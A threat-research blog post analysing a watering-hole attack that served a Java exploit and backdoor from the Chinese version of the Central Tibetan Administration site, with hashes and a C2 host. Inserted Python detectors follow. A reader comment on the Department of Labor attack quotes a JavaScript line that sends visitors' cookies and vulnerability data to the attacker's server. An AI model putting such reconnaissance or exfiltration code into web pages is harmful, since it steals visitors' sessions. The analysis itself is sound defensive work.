
Central Tibetan Administration Website Strategically Compromised as Part of Watering Hole Attack

Kurt Baumgartner
Kaspersky Lab Expert
Posted August 12, 16:47  GMT
Tags: Website Hacks, Sun Java, Targeted Attacks, Microsoft, Vulnerabilities and exploits

A snippet of code on the Central Tibetan Administration website redirects CN-speaking visitors to a Java exploit that drops an APT-related backdoor. For some context, the site describes the administration as "...the Central Tibetan Administration (CTA) of His Holiness the Dalai Lama, this is the continuation of the government of independent Tibet." The choice of placement for the malicious code is fairly extraordinary, so let's dive in.

The attack itself is precisely targeted: an appended, embedded iframe redirects visitors of "xizang-zhiye(dot)org" (the CN-translated version of the site) to a Java exploit that carries a backdoor payload. The English and Tibetan versions of the website do not carry this embedded iframe; only the Chinese version does (please do not visit it at this time). At this point in time, the few systems attacked with this code appear to be located in China and the US, although there could be more. The Java exploit being delivered is the 212 KB "YPVo.jar" (edd8b301eeb083e9fdf0ae3a9bdb3cd6), which also carries the backdoor as an archived resource, drops it and executes it. That file is a 397 KB Win32 executable "aMCBlHPl.exe" (a6d7edc77e745a91b1fc6be985994c6a), detected as "Trojan.Win32.Swisyn.cyxf". Backdoors detected with the Swisyn verdict are frequently part of APT-related toolchains, and this one most certainly is.

The Java exploit appears to attack the older CVE-2012-4681 vulnerability, which is a bit of a surprise, but this vulnerability was used by the same actor when distributing the original CVE-2012-4681 0day (Gondzz.class and Gondvv.class) in August of last year. You can see the 4681 exploit code in the image above, along with code setting the JVM SecurityManager to null to disable Java's policy checks and then running the Payload.main method. The Payload.main method contains some interesting but simple capabilities that let an attacker download the payload over HTTPS and AES-decrypt it using Java's built-in AES crypto libraries, but the package is not configured to use that code in this case. Instead, a couple of lines in its configuration file direct the exploit to drop and execute the jar file's Win32 exe resource. The backdoor itself is detected by most of the AV crowd as variants of gaming password stealers, which is flatly incorrect. The related C2 is located at news.worldlinking.com (59.188.239.46).

This threat actor has been quietly operating these sorts of watering hole attacks for at least a couple of years, alongside standard spearphishing campaigns against a variety of targets that include Tibetan groups. Our KSN community recorded related events going back to at least a busy late 2011 season. We also see Apple-related Java exploits from this server targeting the more recent CVE-2013-2423.

UPDATE 2013.08.13: The CN version of the site at "xizang-zhiye(dot)org" appears to be cleaned up and has not been serving any malicious code that I can find over the past day. The administrators appear to have cleaned everything up on early Tuesday their time/later Monday "western" time and there are no indications of any return since. We will continue to monitor the site for signs of compromise.
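Site operators monitoring for the kind of compromise described above (an iframe appended to one language variant of the site, pointing off-site) can diff each variant's embeds against the site's own hosts. The following is an added example, not code from this post or from the CTA site: the page bodies are constructed, the first-party host list uses only the CN domain named above, and redirect.example.invalid is a placeholder for the redirect host, which the post does not name.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts the site legitimately serves from (the CN domain named in the post).
SITE_HOSTS = {"xizang-zhiye.org", "www.xizang-zhiye.org"}

# Constructed stand-ins for the EN and CN page variants; the off-site host is a placeholder.
PAGES = {
    "en": "<html><body><h1>CTA</h1><script src='/js/menu.js'></script></body></html>",
    "cn": "<html><body><h1>CTA</h1><script src='/js/menu.js'></script></body></html>"
          "<iframe src='http://redirect.example.invalid/x.html' width='0' height='0'"
          " style='display:none'></iframe>",
}

class EmbedCollector(HTMLParser):
    """Collect every iframe/script src, noting whether it appears after </html>."""
    def __init__(self):
        super().__init__()
        self.embeds = []          # (tag, src, hidden, after_html_close)
        self.html_closed = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag not in ("iframe", "script") or not a.get("src"):
            return
        style = (a.get("style") or "").replace(" ", "").lower()
        hidden = a.get("width") == "0" or a.get("height") == "0" or "display:none" in style
        self.embeds.append((tag, a["src"], hidden, self.html_closed))

    def handle_endtag(self, tag):
        if tag == "html":
            self.html_closed = True

def find_injected_embeds(html, site_hosts=SITE_HOSTS):
    """Return one finding per iframe/script whose host is not one of the site's own."""
    parser = EmbedCollector()
    parser.feed(html)
    findings = []
    for tag, src, hidden, appended in parser.embeds:
        host = urlparse(src).hostname
        if host is None or host in site_hosts:   # relative or first-party: expected
            continue
        reasons = ["off-site host " + host]
        if hidden:
            reasons.append("hidden frame")
        if appended:
            reasons.append("appended after </html>")
        findings.append({"tag": tag, "src": src, "reasons": reasons})
    return findings
```

Running `find_injected_embeds` over each language variant flags only the CN page, with the off-site host, the zero-size frame and its position after `</html>` as reasons.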


2 comments


Prashant Kate

2013 Sep 19, 20:04

Watering Hole Attacks an Attractive Alternative to Spear Phishing

“Watering Hole” attacks, as evidenced by the recent attack involving the U.S. Department of Labor, are becoming increasingly popular as alternatives to attacks such as Spear Phishing. In a “Watering Hole” attack, the attacker compromises a site likely to be visited by a particular target group, rather than attacking the target group directly. Eventually, someone from the targeted group visits the “trusted” site (A.K.A. the “Watering Hole”) and becomes compromised.

A malicious site which was recently linked with the Department of Labor attack. According to the evidence we have, the sites www.kforce.com and www.sbc.net were among those compromised during this attack. The webpages that were serving malicious content from these sites were mostly job-search related, but several requests to www.sellagreement.com lacked a “Referrer:” HTTP header entirely.

Technical Details
The Department of Labor and related attacks happened in a few stages. First, a victim visits one of the compromised sites, such as www.sbc.net. This compromised site loads malicious content whose purpose is to scan the victim machine for Anti-Virus software and exploitable software vulnerabilities. After the data collection is complete, the victim machine phones home its configuration data. If the system is found to be running a vulnerable piece of software, an exploit is delivered.

JavaScript files used as part of the reconnaissance portion of the attack. Inside the JavaScript are lists and file system paths of various software programs such as Acrobat, MS Office, Bitdefender, Sophos, Trend, Java and more.

Malicious JavaScript, as recorded by jeek.org

The JavaScript attempts to instantiate objects of various types (Flash, Java) looking for vulnerabilities. The vulnerabilities found are then phoned home back to the www.sellagreement.com server along with cookies and other software version information. The JavaScript source provides clues to the structure of phone home data that is included in the path of the GET request made to the www.sellagreement.com site.

jsme.src = url+'?'+Math.random()+'&vul='+data+'&ck='+escape(document.cookie)+'&flashver='+ver; page.appendChild(jsme);

After the reconnaissance portion of the attack took place, a request to a site hosting the exploit for CVE-2013-1347 occurred; the victim would then be redirected to a site hosting a base64-encoded version of an exploit for the vulnerability. Once decoded, the base64-encoded string shows the function calls used to exploit the vulnerability.

Base 64 Function Call

Decoded Exploit Code vs. Metasploit Code

The Metasploit source code appears to be an exact copy of the sample used in the Department of Labor attack. This is probably simply a case of a Metasploit developer appropriating public code to speed the development process and not an indication of a connection with the attackers.

Note: the payloads are completely different; the Metasploit payloads are not persistent or malicious.

Because this Internet Explorer 8 (IE8) vulnerability is now publicly available in Metasploit, Cisco expects additional similar attacks to occur. As always, keep your browser up-to-date with the latest security patches, and in this case, consider using a web browser other than IE 8.

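The phone-home request quoted in the comment above has a recognisable shape in web-proxy logs: a GET whose query starts with a Math.random() token and then carries vul, ck and flashver fields. The following is an added example, not from the Cisco write-up or this post: it scans constructed squid-style log lines for that shape, assumes the fields are joined with '&', and uses collector.example.invalid as a placeholder for the collecting host; it also notes the missing Referer the comment mentions.

```python
import re
from urllib.parse import urlparse, parse_qs

# The three query fields the quoted JavaScript sends home.
RECON_FIELDS = {"vul", "ck", "flashver"}

# Constructed squid-style log lines: timestamp client method url referer ('-' = none).
# The collector hostname is a placeholder standing in for the real phone-home server.
SAMPLE_LOG = """\
1367100001.123 10.0.0.5 GET http://www.sbc.net/jobs/index.html http://www.sbc.net/
1367100002.456 10.0.0.5 GET http://collector.example.invalid/i.js?0.7231&vul=java17,flash11&ck=sid%3Dabc&flashver=11.6 -
1367100003.789 10.0.0.9 GET http://cdn.example.com/lib.js?0.12&v=3 http://www.kforce.com/
"""
LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\S+)$")

def parse_recon_query(url):
    """Return the decoded recon fields when the query has the phone-home shape, else None."""
    query = urlparse(url).query
    params = parse_qs(query, keep_blank_values=True)
    if not RECON_FIELDS <= set(params):
        return None
    first = query.split("&", 1)[0]      # cache-busting Math.random() token, carries no '='
    return {
        "random": first if "=" not in first else None,
        "vul": params["vul"][0].split(","),
        "cookie": params["ck"][0],      # parse_qs already percent-decodes the cookie
        "flashver": params["flashver"][0],
    }

def scan_log(text):
    """One finding per line that phones recon data home; flags a missing Referer too."""
    findings = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        _ts, client, _method, url, referer = m.groups()
        data = parse_recon_query(url)
        if data is None:
            continue
        data.update(client=client, host=urlparse(url).hostname, no_referer=(referer == "-"))
        findings.append(data)
    return findings
```

Only the second constructed line matches; the third shows that a random-looking token alone is not enough, since all three fields must be present.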

Kurt Baumgartner

2013 Oct 24, 21:20

Re: Watering Hole Attacks an Attractive Alternative to Spear Phishing

Thanks for the interesting text from the Cisco blog, Prashant. Yes, you might notice in some of our other reports, like the TeamSpy report earlier this year, that in addition to spear-phishing, these targeted threat actors have been using watering holes for years now. And, the server side attacks they have been doing are even less publicly reported on than the watering hole stuff. They are all parts of their toolsets.
